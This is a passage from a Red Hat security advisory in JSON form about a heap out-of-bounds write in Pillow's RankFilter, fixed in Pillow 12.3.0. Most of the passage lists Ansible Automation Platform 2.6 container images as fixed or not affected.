"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500043"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow prior to 12.3.0. The public RankFilter API can trigger a native heap out-of-bounds write when given a very large odd filter size. ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation, and ImagingExpand() computes output dimensions with unchecked signed integer arithmetic. This can lead to denial of service and limited integrity impact via heap corruption.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Pillow: Pillow: Native heap out-of-bounds write",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Pillow\u0027s RankFilter API is vulnerable to a native heap out-of-bounds write when a caller supplies a very large odd filter size. Expansion runs before size validation and ImagingExpand uses unchecked signed integer arithmetic for output dimensions. A remote attacker who can drive RankFilter with attacker-controlled sizes may crash the process or corrupt heap memory. Fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
